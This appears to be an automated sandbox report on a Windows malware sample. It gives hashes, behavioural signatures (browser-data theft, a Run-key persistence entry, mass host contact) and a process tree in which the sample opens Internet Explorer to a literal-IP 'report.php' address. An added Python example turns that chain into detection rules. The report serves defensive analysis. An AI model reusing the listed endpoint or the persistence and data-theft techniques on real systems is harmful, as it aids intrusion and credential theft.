Analysis
- max time kernel: 150s
- max time network: 153s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 03/04/2024, 18:55

Static task: static1
Behavioral task: behavioral1
- Sample: a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe
- Resource: win7-20240221-en
General
- Target: a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe
- Size: 456KB
- MD5: a3f438a8e89dab04e2649de7e6e9ffa1
- SHA1: 2b61bd13401594fe946cb52d0054ab5e1754a119
- SHA256: a3aebdb374066a1250ef73bcde03e449e542f278d7d1d0f6c6b3b056619f2774
- SHA512: 98e5186cb17e86b637d305c2e347f59613ddafd86cf5fc1852eec793b432025e7c615014029605c9e697baba24b0d099d40ce0390c4008c3e2c0a69040bdc369
- SSDEEP: 6144:ppMM8EV1kmffCpJipAQeNai17Y56rKbDJDODuLn2WvDUyX8rp/mRTCF:URmfaXiGQeN/7YkrOdii72mI
Malware Config
Signatures
- Contacts a large (965) amount of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ati display driver = "ÔN@" (process: a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe)
- Drops file in System32 directory (64 IoCs)
- Drops file in Program Files directory (64 IoCs)
- Drops file in Windows directory (64 IoCs)
- Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process
2168 IEXPLORE.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process
2168 IEXPLORE.exe
2168 IEXPLORE.exe
3016 IEXPLORE.EXE
3016 IEXPLORE.EXE
3016 IEXPLORE.EXE
3016 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target
PID 2000 wrote to memory of 2168 2000 a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe 28
PID 2000 wrote to memory of 2168 2000 a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe 28
PID 2000 wrote to memory of 2168 2000 a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe 28
PID 2000 wrote to memory of 2168 2000 a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe 28
PID 2168 wrote to memory of 3016 2168 IEXPLORE.exe 29
PID 2168 wrote to memory of 3016 2168 IEXPLORE.exe 29
PID 2168 wrote to memory of 3016 2168 IEXPLORE.exe 29
PID 2168 wrote to memory of 3016 2168 IEXPLORE.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe (depth 1)
"C:\Users\Admin\AppData\Local\Temp\a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe"
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2000
  C:\Program Files\Internet Explorer\IEXPLORE.exe (depth 2, child of PID 2000)
  "C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2168
    C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (depth 3, child of PID 2168)
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2168 CREDAT:275457 /prefetch:2
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:3016
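The tree above shows an executable running from the user's Temp directory (PID 2000) starting IEXPLORE.exe (PID 2168) with a URL whose host is a literal IPv4 address, 212.33.237.86, after which the IE frame process starts its own tab process (PID 3016). That parent/child relation, not the browser image by itself, is what a process-creation hunt rule should key on. The Python below is an added example and is not part of this sandbox report or of the tooling that produced it. It evaluates two rules over process-creation records constructed from the Processes section (PIDs, images and command lines as listed there); the explorer.exe records and the allow-list of parents from which a browser launch is expected are assumptions to be tuned per estate.

```python
"""Process-tree hunt rules for the chain in the report above.

Added example. The event records are constructed from the report's
Processes section (pids 2000 -> 2168 -> 3016) plus an assumed benign
explorer.exe launch; they are not Sysmon or EDR output from the page.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 / EDR equivalent)."""
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Constructed from the report's process tree. PIDs 1000/1001 are an assumed
# benign launch (explorer.exe opening an intranet IP) to show the rules stay quiet.
EVENTS: List[ProcEvent] = [
    ProcEvent(2000, None,
              r"C:\Users\Admin\AppData\Local\Temp\a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\a3f438a8e89dab04e2649de7e6e9ffa1_JaffaCakes118.exe"'),
    ProcEvent(2168, 2000,
              r"C:\Program Files\Internet Explorer\IEXPLORE.exe",
              r'"C:\Program Files\Internet Explorer\IEXPLORE" 212.33.237.86/images/1/report.php'),
    ProcEvent(3016, 2168,
              r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
              r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2168 CREDAT:275457 /prefetch:2'),
    ProcEvent(1000, None, r"C:\Windows\explorer.exe", r'"C:\Windows\explorer.exe"'),
    ProcEvent(1001, 1000,
              r"C:\Program Files\Internet Explorer\IEXPLORE.exe",
              r'"C:\Program Files\Internet Explorer\IEXPLORE" http://10.0.0.5/intranet/'),
]

BROWSER_IMAGES = {"iexplore.exe"}
# Assumption: parents from which a browser launch is routine; tune per estate.
EXPECTED_BROWSER_PARENTS = {"explorer.exe", "iexplore.exe"}
USER_TEMP_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)
# Optional scheme, a dotted quad, optional port and path.
DOTTED_QUAD_URL_RE = re.compile(
    r"(?:https?://)?\b(\d{1,3}(?:\.\d{1,3}){3})\b(?::\d+)?(?:/\S*)?")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def bare_ip_url(cmdline: str) -> Optional[str]:
    """Return the first URL in cmdline whose host is a literal IPv4 address."""
    for m in DOTTED_QUAD_URL_RE.finditer(cmdline):
        try:
            ipaddress.IPv4Address(m.group(1))
        except ValueError:  # e.g. 300.1.2.3: dotted but not an address
            continue
        return m.group(0)
    return None


def hunt(events: List[ProcEvent]) -> List[dict]:
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    hits: List[dict] = []
    for ev in events:
        if basename(ev.image) not in BROWSER_IMAGES:
            continue
        parent = by_pid.get(ev.ppid)
        parent_name = basename(parent.image) if parent else ""
        url = bare_ip_url(ev.cmdline)
        # Rule 1: a browser told to open a bare-IP URL by a parent that is
        # neither the shell nor another browser (how report.php was reached).
        if url and parent_name not in EXPECTED_BROWSER_PARENTS:
            hits.append({"rule": "browser_bare_ip_url_unusual_parent",
                         "pid": ev.pid, "parent": parent_name, "url": url})
        # Rule 2: the parent itself runs out of a user Temp directory.
        if parent and USER_TEMP_RE.match(parent.image):
            hits.append({"rule": "temp_executable_spawned_browser",
                         "pid": ev.pid, "parent": parent.image})
    return hits


if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
```

Only PID 2168 fires, on both rules. PID 3016 stays quiet because its parent is the IE frame process, which is where IE tab processes normally come from, and the assumed explorer.exe launch stays quiet because explorer.exe is on the allow-list even though it opened a bare-IP URL. The "wrote to memory" records above, four per child, are consistent with a parent writing into a child it has just created; they corroborate the parent/child edges but are not by themselves evidence of code injection, so the URL and the Temp-directory parent are the signal to alert on.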
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize 602KB
MD5 340fb17a66fc74230e3c88438bb0cd68
SHA1 1ca86e8c95a8da91d422f51bddf6dc868d71fffc
SHA256 893ab96a06242049bdf42a6d60316bac256f96e63db3504ddd6f6091bd748b27
SHA512 6199666dee3754115ad6fa2050d65afb7885a890e9e76dd99dadf061779a0870488f0c8d314217c9a04b8737c3578294bc2d467e1051a931c599dfd9588d01ce
-
Filesize 68KB
MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 3f012f8ebd0852b07ac73e4aec58229c
SHA1 e7246a951bac39e75cffe0fa3af2e9f7a566e030
SHA256 c6427d5eff8324f01f3a2c11f32d35c63e03a24541473a6eb3daa998f7b3f09b
SHA512 33b30b09947565c2f05124db9b33d61584c0fa20c9317ed1298a3e47ffc20ff5d0279414e158a8334845089697e17081707e77864534822654cff108d1516e7a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 f7e3af80835b15692a28f6f93aaefda3
SHA1 50204908184a3d626d74325b40e817e1bef7d3e6
SHA256 4a6cd8258344a953413ec3ad31a92a6676e39e99fe6087bbf66850b1792b2a9c
SHA512 e6188119f6212b9d03e00e1c20a9d2dc3bc10161770e1686c7c323619356fe8afaa790b5c2eaac4e5a79a6b046646a8ee55214bf488dc2b7bb0b1468acd804a1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 a44ebe2399c09ee07799c25eedef4187
SHA1 97f7c83dd519f27df53737c66ac3f20522877463
SHA256 63d8dfd9e59c68fba0aa8b315583922af117a40b880dfdbea4c8b748a9511008
SHA512 cb5bce4e7ff08b908e9da35c1854edee0632c19699773986f7ffa53665aabfbce77b44892ebe5ea6015c2c6fcc66bd5593a12416c64c57b813abbb2df957d18e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 fe7ee77cb15f8232accda5f1b32a43b1
SHA1 cf5d31e149fef087e57bda39efe09510ed2ae852
SHA256 46aadae883b31df11fd9be3bd4189420b62c446c1ad1464d38e5f313ae8616e9
SHA512 a5e98c5b25b184d0d21c91be8b3d26c47536a7dac00641a6d1adc8483cb1607c71c2379aadde7f62f6f14e2cf7746126c10a9c5f2ab42de3d3ab9ca8b24d8282
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 fabcade13b571e9e8f733945bee19096
SHA1 3c7e48c095a331b0949be7a20ad0934973d0ad45
SHA256 018b00419284a710aabc955f6acf419b16fb3bc2882d6b62c953f44a680b0c50
SHA512 0dd458df6939ec0374550c5f9f26ea84dce7df3691366337330b45d490a27446255fe0909fc72cc5d61919ba13a575a48e70937636648c22821d87686f3760df
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 094c7c40ecba7e2f9a1cf3664b4d4739
SHA1 517c56f569a3e9350c7430098160d043b71b01bd
SHA256 052e8bf93544df3500118eb84d539fdf2bf43c75edc3144ef94859477d13fdb1
SHA512 7516fd6e664318badf18c74e148eadc71a18c6ee3d9b0c584b8098d4e7d54f4efb00cf57799948e742107637ed690d8785a078f6d0775a3f5b7be700cd8480d7
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 98ea71280b54c33825d78ac6c7771068
SHA1 1325dff08519d0021aa0df3cd27bda9a9fe2d352
SHA256 6d46ee992fdeebe7f899791a7f738ea8ea9aeb0e52fd285e0aad2d26293f6f78
SHA512 531c0717eaf77aa07a64f5d7b2b2255b9aab5ec6fa4d117c72d255c7fb23a173247f96380e3d0e5aa6dedfbe9d35249f360bd49c6c94cacf8f26d4dfea892524
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 300c1e5d352ca261798f9673d9fdbf64
SHA1 ce4ec48415c7e6df6f5d604c30aff1a7ceae97c3
SHA256 d682e035c6c3a658c78b337a56573c753bae83e9fd2438ac011bfc0126070ed0
SHA512 99fec3b930a84b6e9ca4271463ea744c296c08296d6f02d4b43d11672e28c4d45b6574460e77881b57475cab9449bbd5a86f1908fe56fb0529af41d25c404303
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 8002d77b0e39b6afb4481306f236e40d
SHA1 343e0266fc34226ae98d67e97850aa9e165a5524
SHA256 1d003a3eaf655c33317495fbe12034d601aa63c3a7427e0289ac8c55fbdbcd3b
SHA512 e7989618cefa377431a90bca45f80d762bbf13a882af160a4f1cf2545590356342dfeeb0bde2e48def0844216d3132eb098cfed30eb91abc16869a1d3ee9bac8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 9ff2d303bcd44137cdfd94d3e4070c3c
SHA1 12e31162dcfe2fde0da5daa014517b5a3bf8e2a2
SHA256 b1c90425ae709367cec6979c8a55b63d6d89029f6e54a252f5e846c8f6c1f649
SHA512 b7e4a4ee262911ba0f8f89ab2eb22fa60c8764d1d9a1d63e87a13a9faa3a3b3bfafea6eba386d7dfa8e01a0f60f6545f1d1eed9652bc10a0812ca4805394519d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 b1a2e3b53dfe3b01e8b0be2ae330a760
SHA1 d49b225793e4ee80f736fc43e2738606b5f797e5
SHA256 a0f1626f1c7bb80b0781bf9ed83b531c1f319d3ae3cbc28a998376af74f3745d
SHA512 45171cce11ee679c4b7ba4ac458d5df34aab614bc8d03cf6357f371333d268bcad28dadf31e3bae712b8d7840444ff11d9db0c075e0ee1df63d957b48dfbd1c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 720ae9c657c785243f7391528e60574e
SHA1 d2ddde44c726d8235a13a1f607537991ac96cf51
SHA256 30de53b2556ff1c06a5f883a608c789963b2198783fc552088e1b2c7bb138b74
SHA512 a6142fcb1dfa47e1953d218516f9e0cc15ceff228647d1b9b2844dde6fcb601b52ff04350f251c5cb6679336fc963c42842eba08ddd6b96342bad14098742612
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 b6dc1002b210849b4fb057c755dddeae
SHA1 6f838d082337850ee7a533e6e1040425d4cf2801
SHA256 cc2c20289cf4963bf32bcc020d95aadfdeb39e67e891763c2fabffec12f9763d
SHA512 354fa302092085d4734708fff99a89ae573a491beaf4b35fafb47cf69ce56011b1e530cb117f3d6981e8463d166aa6f919b0d03b2872ce39741e2106740be332
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 859178c80d99f9dded579a7c368215a7
SHA1 403478a5e5d55e739f30a34494e0cd6656aaeefd
SHA256 ba0d37e4b1488b856d416f3d4fb6ef623277b823f452d440b30bc10827ea8fd3
SHA512 ac0096311bbe4f4ca4fd22c52d16f4e9ffd88e1234311e79d6853867243519b567a319e11c75b462283ddef66ba5ae7e8c426dc90ea59ecc9bede273d0713f51
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 5d73f0e34b79df6a334326efa0b6f59c
SHA1 1a97730da09b21d27d0f0a908b9771efd077a4a9
SHA256 f0a033e08f702d8db8fccd48f5f494e929c2080e621b96382d0653e42d7a3a51
SHA512 270147abd86b0ca6ed537d4fa759f78f7844ff958824c06d7bae33cec2eb892584f7cecb71256c95948bf387d73f659cf0f453e351abb230899dcd952e73140a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 36fd1c14a124d4991c0bc1ab89e8f732
SHA1 774350c5fa86d80bd5689fbe771d3a1ed5323941
SHA256 6f4c8abca836c325c7d655a0767253cc4f6d2f93523e77f45b6f0f02f984dd39
SHA512 e59fa24acff4ac2042603883ed48b99cb7a4a55c80b0cde6e2a3807175f58000bc76e8ef5aa46b6fd6c900269399758b1f7b38727c09a4086a7152683b5a36f3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 cf18f89354f8a16faa8fee8fafcff4de
SHA1 328f4cc4b3076f62263bfb1a7d15624362900bb8
SHA256 7b31c132534f370f35749bea89d085cf5c4e37861b9fa27bf4ba5449d61f9e37
SHA512 21b4397590ad69064605c0e0419bb8fe933e9b8788551df12ec3db3cdcaa8b08bd9244760c6a7d7f603b7ad7b990f813841049ffef8504806eb336abeea766f1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 8eb47d5f42af1c7fcac354b61372924c
SHA1 d8d16f4c26de84699855287a9d586018053b0baa
SHA256 5e73ee89bac3a6061952f290e62da1e0ec72c1087a1ddc68c91c6ab64e95c199
SHA512 2ed178deeca345fef7e10955721360e859522ad3f316e465e60ae58472a129f682915eaacfbd06c31206be86c90e6883c94f820b9ab25755d6b9b9253ebdd697
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 894c53ed2a562496863c72d9c7e229cd
SHA1 a6e92ad0b86073ceea4bcbda57c38a01b23b929e
SHA256 04cb41a200fa3f0859283d697c77c4dad6fcb6bb4a8b4df516d1629b25a7ec1e
SHA512 8fe88fcc3a31cb7204ebfd523a1e653faf75dda55eaf518cb4c6f3c8caf834c58e38b99ed0dd9cddb6c6e6b6277dd6bd9034a650e84fb8332d84b5ab27816ecb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 c70092f393cb943f42cc57d8f520718e
SHA1 bb8906bd04f2f727f7f094d23c109e7087ba6d0e
SHA256 f0930d6eaa417ac23c6ea8914c0f5df1fc4738183ab6c343ad42594c08344dae
SHA512 c006af55c10a1d80f9ba722dab57c175a8df8a794bb05d1938380fc0ba92b26d233a3095270a5fe4147e55c64e783626d7a64c93c25822a4d6c701abcf9ebcfb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize 344B
MD5 7c5b6995a94d60101b1ecef292030b1b
SHA1 7f3a49f702b8235338994e0e8fe99eea52b8668b
SHA256 939c9855408cde45d62b89f53c7064e2af070e332094a0a96aefff1e71f659cf
SHA512 9ddd579079e66ffa34824596869984fdc1e906ebfc058848555e4bba73e4aef38faff37932e3d44b8ee346c7ff1ff515e3054ed66171d638a5a2b811a2eeaceb
-
Filesize 65KB
MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize 177KB
MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a